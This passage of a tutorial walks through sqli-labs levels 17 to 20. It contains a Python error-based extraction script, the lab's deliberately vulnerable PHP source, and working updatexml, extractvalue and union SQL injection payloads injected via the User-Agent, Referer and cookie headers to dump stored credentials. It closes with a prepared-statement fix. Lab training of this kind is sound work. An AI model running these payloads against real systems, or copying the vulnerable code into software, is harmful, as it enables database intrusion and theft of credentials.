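# Constructed sample rows for the offline stand-in (not read from the lab).
SAMPLE_USERS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (3, "Dummy", "p@ssword"),
                (4, "secure", "crappy"), (5, "stupid", "stupidity"), (6, "superman", "genious"),
                (7, "batman", "mob!le"), (8, "admin", "admin")]


def parse_xpath_error(body):
    """Return the text leaked between the ~ markers, or None if no XPath error is present."""
    m = XPATH_ERR.search(body)
    return m.group(1) if m else None


def updatexml_payload(expr):
    """passwd value for Less-17: it lands unescaped in UPDATE users SET password = '...'."""
    return "' or updatexml(1,concat(0x7e,(%s),0x7e),1)#" % expr


def extract_via_errors(oracle, expr, chunk=31):
    """Fetch `expr` 31 characters at a time until a short or empty slice comes back."""
    out, offset = "", 1
    while True:
        leaked = parse_xpath_error(oracle("mid(%s,%d,%d)" % (expr, offset, chunk)))
        if not leaked:
            break
        out += leaked
        if len(leaked) < chunk:
            break
        offset += chunk
    return out


def less17_oracle(url="http://127.0.0.1/sqli-labs/Less-17/", uname="admin"):
    """Real oracle: POST the payload in passwd and hand back the HTML (needs a running lab)."""
    def oracle(expr):
        data = urllib.parse.urlencode(
            {"uname": uname, "passwd": updatexml_payload(expr), "submit": "Submit"}).encode()
        with urllib.request.urlopen(url, data=data, timeout=10) as resp:
            return resp.read().decode("utf-8", "replace")
    return oracle


def fake_oracle(expr):
    """Offline stand-in for the page: evaluate `expr` in SQLite and format the error
    MySQL's updatexml() raises for concat(0x7e, expr, 0x7e), cut to 32 chars like MySQL."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    # SQLite has substr() but not MySQL's mid() alias, so register one for the demo.
    conn.create_function("mid", 3,
                         lambda s, pos, n: "" if s is None else str(s)[pos - 1:pos - 1 + n])
    value = conn.execute("SELECT %s" % expr).fetchone()[0]
    return "XPATH syntax error: '%s'" % ("~%s~" % value)[:32]


if __name__ == "__main__":
    print(extract_via_errors(fake_oracle, "(select group_concat(username) from users)"))
    # live lab: extract_via_errors(less17_oracle(),
    #   "(select group_concat(table_name) from information_schema.tables where table_schema='security')")
```

The same loop drives extractvalue(): only the payload string changes. Swap `less17_oracle()` for a function that puts the payload wherever the injection point is and the paging logic is unchanged.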


Less-18 Error-based User-Agent header POST injection

First open the page; it shows "Welcome Dhakkan".


② View the source code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-18 Header Injection- Error Based- string</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome   <font color="#FF0000"> Dhakkan </font><br></div>
<div  align="center" style="margin:20px 0px 0px 510px;border:20px; background-color:#0CF; text-align:center;width:400px; height:150px;">
<div style="padding-top:10px; font-size:15px;">
<!--Form to post the contents -->
<form action="" name="form1" method="post">
<div style="margin-top:15px; height:30px;">Username :        <input type="text"  name="uname" value=""/>  </div>
<div> Password :        <input type="text" name="passwd" value=""/></div></br>
<div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>
</form>
</div>
</div>
<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">
<font size="3" color="#FFFF00">
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

function check_input($value)
{
    if(!empty($value))
    {
        // truncation (see comments)
        $value = substr($value,0,20);
    }

    // Stripslashes if magic quotes enabled
    if (get_magic_quotes_gpc())
    {
        $value = stripslashes($value);
    }

    // Quote if not a number
    if (!ctype_digit($value))
    {
        $value = "'" . mysql_real_escape_string($value) . "'";
    }
    else
    {
        $value = intval($value);
    }
    return $value;
}

$uagent = $_SERVER['HTTP_USER_AGENT'];
$IP = $_SERVER['REMOTE_ADDR'];
echo "<br>";
echo 'Your IP ADDRESS is: ' .$IP;
echo "<br>";
//echo 'Your User Agent is: ' .$uagent;

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname = check_input($_POST['uname']);
    $passwd = check_input($_POST['passwd']);

    /*
    echo 'Your Your User name:'. $uname;
    echo "<br>";
    echo 'Your Password:'. $passwd;
    echo "<br>";
    echo 'Your User Agent String:'. $uagent;
    echo "<br>";
    echo 'Your User Agent String:'. $IP;
    */

    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Agent:'.$uname."\n");
    fclose($fp);

    $sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
    $result1 = mysql_query($sql);
    $row1 = mysql_fetch_array($result1);

    if($row1)
    {
        echo '<font color= "#FFFF00" font size = 3 >';
        $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
        mysql_query($insert);
        //echo 'Your IP ADDRESS is: ' .$IP;
        echo "</font>";
        //echo "<br>";
        echo '<font color= "#0000ff" font size = 3 >';
        echo 'Your User Agent is: ' .$uagent;
        echo "</font>";
        echo "<br>";
        print_r(mysql_error());
        echo "<br><br>";
        echo '<img src="../images/flag.jpg"  />';
        echo "<br>";
    }
    else
    {
        echo '<font color= "#0000ff" font size="3">';
        //echo "Try again looser";
        print_r(mysql_error());
        echo "</br>";
        echo "</br>";
        echo '<img src="../images/slap.jpg"   />';
        echo "</font>";
    }
}
?>
</font>
</div>
</body>
</html>

Both uname and passwd pass through check_input(), so injecting through those inputs will not work. But in the code we find an INSERT:

$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";

It writes the User-Agent and the client IP into the database, so can we inject through that? Changing our IP address is not convenient, but the User-Agent is easy to change, so we start there.


Which tool for manual injection? Burp's Repeater is very convenient; Firefox add-ons such as Live HTTP Headers or Tamper Data should work too. Below I use Burp Suite.


Note that the INSERT only runs after a correct username and password pass the login check, so valid credentials are required to reach the User-Agent handling. This mirrors the real-world case of registering or logging in and injecting afterwards. With valid credentials the page echoes our User-Agent.

Next, intercept and modify the request in Burp Suite to get the database name. There are many ways; two payloads:
' or updatexml(1,concat(0x2b5e,database()),0) or '
' and extractvalue(1,concat(0x7e,(database()))) and '1'='1

Skipping the step-by-step, get the usernames and passwords directly:
' or updatexml(1,concat(0x2b5e,(select concat_ws(0x2b5e,id,username,password) from users limit 0,1)),0) or '



Less-19 Referer header POST error-based injection

First open the page; it shows "Welcome Dhakkan".


② View the source code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-19 Header Injection- Referer- Error Based- string</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome   <font color="#FF0000"> Dhakkan </font><br></div>
<div  align="center" style="margin:20px 0px 0px 510px;border:20px; background-color:#0CF; text-align:center;width:400px; height:150px;">
<div style="padding-top:10px; font-size:15px;">
<!--Form to post the contents -->
<form action="" name="form1" method="post">
<div style="margin-top:15px; height:30px;">Username :        <input type="text"  name="uname" value=""/>  </div>
<div> Password :        <input type="text" name="passwd" value=""/></div></br>
<div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>
</form>
</div>
</div>
<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">
<font size="3" color="#FFFF00">
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

function check_input($value)
{
    if(!empty($value))
    {
        // truncation (see comments)
        $value = substr($value,0,20);
    }

    // Stripslashes if magic quotes enabled
    if (get_magic_quotes_gpc())
    {
        $value = stripslashes($value);
    }

    // Quote if not a number
    if (!ctype_digit($value))
    {
        $value = "'" . mysql_real_escape_string($value) . "'";
    }
    else
    {
        $value = intval($value);
    }
    return $value;
}

$uagent = $_SERVER['HTTP_REFERER'];
$IP = $_SERVER['REMOTE_ADDR'];
echo "<br>";
echo 'Your IP ADDRESS is: ' .$IP;
echo "<br>";
//echo 'Your User Agent is: ' .$uagent;

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname = check_input($_POST['uname']);
    $passwd = check_input($_POST['passwd']);

    /*
    echo 'Your Your User name:'. $uname;
    echo "<br>";
    echo 'Your Password:'. $passwd;
    echo "<br>";
    echo 'Your User Agent String:'. $uagent;
    echo "<br>";
    echo 'Your User Agent String:'. $IP;
    */

    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'Referer:'.$uname."\n");
    fclose($fp);

    $sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
    $result1 = mysql_query($sql);
    $row1 = mysql_fetch_array($result1);

    if($row1)
    {
        echo '<font color= "#FFFF00" font size = 3 >';
        $insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
        mysql_query($insert);
        //echo 'Your IP ADDRESS is: ' .$IP;
        echo "</font>";
        //echo "<br>";
        echo '<font color= "#0000ff" font size = 3 >';
        echo 'Your Referer is: ' .$uagent;
        echo "</font>";
        echo "<br>";
        print_r(mysql_error());
        echo "<br><br>";
        echo '<img src="../images/flag.jpg" />';
        echo "<br>";
    }
    else
    {
        echo '<font color= "#0000ff" font size="3">';
        //echo "Try again looser";
        print_r(mysql_error());
        echo "</br>";
        echo "</br>";
        echo '<img src="../images/slap.jpg"  />';
        echo "</font>";
    }
}
?>
</font>
</div>
</body>
</html>

From the source we see that it reads HTTP_REFERER; otherwise it is basically the same as Less-18, so we modify the Referer header instead.

Getting the usernames and passwords works as before:
' or updatexml(1,concat(0x2b5e,(select concat_ws(char(32,44,32),id,username,password) from users limit 0,1)),1) or'

This time, though, let's use the other function:

EXTRACTVALUE (XML_document, XPath_string);
first argument: XML_document, a string holding the XML document (called Doc in the manual's example);
second argument: XPath_string, an expression in XPath syntax.
It returns the string matched by the XPath query in the target XML.

' or extractvalue(1,concat(0x2b5e,(select concat_ws(char(32,44,32),id,username,password) from users limit 0,1))) or'

The result is the same, so no screenshot.


Less-20 Error-based Cookie header POST injection

First open the page; it shows "Welcome Dhakkan".


② View the source code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-20 Cookie Injection- Error Based- string</title>
</head>
<body bgcolor="#000000">
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

if(!isset($_COOKIE['uname']))
{
    //including the Mysql connect parameters.
    include("../sql-connections/sql-connect.php");
    echo "<div style=' margin-top:20px;color:#FFF; font-size:24px; text-align:center'> Welcome   <font color='#FF0000'> Dhakkan </font><br></div>";
    echo "<div  align='center' style='margin:20px 0px 0px 510px;border:20px; background-color:#0CF; text-align:center;width:400px; height:150px;'>";
    echo "<div style='padding-top:10px; font-size:15px;'>";
    echo "<!--Form to post the contents -->";
    echo '<form action=" " name="form1" method="post">';
    echo ' <div style="margin-top:15px; height:30px;">Username :    ';
    echo '   <input type="text"  name="uname" value=""/>  </div>';
    echo ' <div> Password :      ';
    echo '   <input type="text" name="passwd" value=""/></div></br>';
    echo '   <div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>';
    echo '</form>';
    echo '</div>';
    echo '</div>';
    echo '<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">';
    echo '<font size="3" color="#FFFF00">';
    echo '<center><br><br><br>';
    echo '<img src="../images/Less-20.jpg" />';
    echo '</center>';

    function check_input($value)
    {
        if(!empty($value))
        {
            $value = substr($value,0,20); // truncation (see comments)
        }
        if (get_magic_quotes_gpc())  // Stripslashes if magic quotes enabled
        {
            $value = stripslashes($value);
        }
        if (!ctype_digit($value))   // Quote if not a number
        {
            $value = "'" . mysql_real_escape_string($value) . "'";
        }
        else
        {
            $value = intval($value);
        }
        return $value;
    }
    echo "<br>";
    echo "<br>";

    if(isset($_POST['uname']) && isset($_POST['passwd']))
    {
        $uname = check_input($_POST['uname']);
        $passwd = check_input($_POST['passwd']);
        $sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
        $result1 = mysql_query($sql);
        $row1 = mysql_fetch_array($result1);
        $cookee = $row1['username'];
        if($row1)
        {
            echo '<font color= "#FFFF00" font size = 3 >';
            setcookie('uname', $cookee, time()+3600);
            header ('Location: index.php');
            echo "I LOVE YOU COOKIES";
            echo "</font>";
            echo '<font color= "#0000ff" font size = 3 >';
            //echo 'Your Cookie is: ' .$cookee;
            echo "</font>";
            echo "<br>";
            print_r(mysql_error());
            echo "<br><br>";
            echo '<img src="../images/flag.jpg" />';
            echo "<br>";
        }
        else
        {
            echo '<font color= "#0000ff" font size="3">';
            //echo "Try again looser";
            print_r(mysql_error());
            echo "</br>";
            echo "</br>";
            echo '<img src="../images/slap.jpg" />';
            echo "</font>";
        }
    }
    echo "</font>";
    echo '</font>';
    echo '</div>';
}
else
{
    if(!isset($_POST['submit']))
    {
        $cookee = $_COOKIE['uname'];
        $format = 'D d M Y - H:i:s';
        $timestamp = time() + 3600;
        echo "<center>";
        echo '<br><br><br>';
        echo '<img src="../images/Less-20.jpg" />';
        echo "<br><br><b>";
        echo '<br><font color= "red" font size="4">';
        echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
        echo "</font><br>";
        echo '<font color= "cyan" font size="4">';
        echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];
        echo "</font><br>";
        echo '<font color= "#FFFF00" font size = 4 >';
        echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br>";
        echo '<font color= "orange" font size = 5 >';
        echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
        echo "<br></font>";
        $sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
        $result=mysql_query($sql);
        if (!$result)
        {
            die('Issue with your mysql: ' . mysql_error());
        }
        $row = mysql_fetch_array($result);
        if($row)
        {
            echo '<font color= "pink" font size="5">';
            echo 'Your Login name:'. $row['username'];
            echo "<br>";
            echo '<font color= "grey" font size="5">';
            echo 'Your Password:' .$row['password'];
            echo "</font></b>";
            echo "<br>";
            echo 'Your ID:' .$row['id'];
        }
        else
        {
            echo "<center>";
            echo '<br><br><br>';
            echo '<img src="../images/slap1.jpg" />';
            echo "<br><br><b>";
            //echo '<img src="../images/Less-20.jpg" />';
        }
        echo '<center>';
        echo '<form action="" method="post">';
        echo '<input  type="submit" name="submit" value="Delete Your Cookie!" />';
        echo '</form>';
        echo '</center>';
    }
    else
    {
        echo '<center>';
        echo "<br>";
        echo "<br>";
        echo "<br>";
        echo "<br>";
        echo "<br>";
        echo "<br>";
        echo '<font color= "#FFFF00" font size = 6 >';
        echo " Your Cookie is deleted";
        setcookie('uname', $row1['username'], time()-3600);
        header ('Location: index.php');
        echo '</font></center></br>';
    }
    echo "<br>";
    echo "<br>";
    //header ('Location: main.php');
    echo "<br>";
    echo "<br>";
    //echo '<img src="../images/slap.jpg" /></center>';
    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'Cookie:'.$cookee."\n");
    fclose($fp);
}
?>
</body>
</html>


Analysing the code: it first checks whether the uname cookie is present. If not, it looks the user up from the POST form and then sets the cookie. If the cookie exists, there are two cases:

Case one: you have logged in, the cookie is still valid, and you have not pressed the delete-cookie button. The page then prints all sorts of information, including the delete-cookie button.

Case two: you pressed the delete-cookie button. The backend sets the cookie's expiry to a time in the past, so the cookie is deleted.

Key code (note that the cookie value goes into the query without passing through check_input):
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";

So without further ado, let's do it in one shot:
-admin' union select 1,group_concat(char(32),username,char(32)),group_concat(char(32),password,char(32)) from users--+
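For contrast, here is the cookie lookup from the key code above rewritten with a prepared statement, so the cookie value is sent to the database as data rather than spliced into the SQL text. This is an added example, not code from sqli-labs; it assumes PDO with an in-memory SQLite database (the lab uses the mysql_* API against MySQL) and a constructed users table with the same columns.

```php
<?php
// Added example, not part of sqli-labs. The lab builds
// "SELECT * FROM users WHERE username='$cookee' LIMIT 0,1" by string
// concatenation, so whatever is in the uname cookie is parsed as SQL.
// Here the query text is fixed and the cookie value is bound as a
// parameter, so it can only ever be compared as a username.

function lookupUserByCookie(PDO $pdo, string $cookieName): ?array
{
    $stmt = $pdo->prepare(
        'SELECT id, username FROM users WHERE username = :uname LIMIT 1'
    );
    $stmt->bindValue(':uname', $cookieName, PDO::PARAM_STR);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample data standing in for the lab's users table
// (in-memory SQLite so the example runs stand-alone, offline).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)');
$pdo->exec("INSERT INTO users (username, password) VALUES ('Dumb', 'Dumb'), ('admin', 'admin')");

// A genuine cookie value resolves to its row.
var_dump(lookupUserByCookie($pdo, 'admin'));

// The union payload from this post is now looked up literally as a
// username: no row matches and no second SELECT is ever executed.
$payload = "-admin' union select 1,group_concat(username),group_concat(password) from users--";
var_dump(lookupUserByCookie($pdo, $payload));
```

The prepared statement closes the injection but not the other defect visible in the source: a plaintext username cookie is accepted as proof of login, so anyone who sets uname=admin is treated as admin. That needs a server-side session keyed by a random token, not a parameter binding.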


If you have any questions, feel free to reply in the comments.

Reference links:
http://blog.csdn.net/u012763794/article/details/51361152
http://www.cnblogs.com/lcamry/p/5763024.html

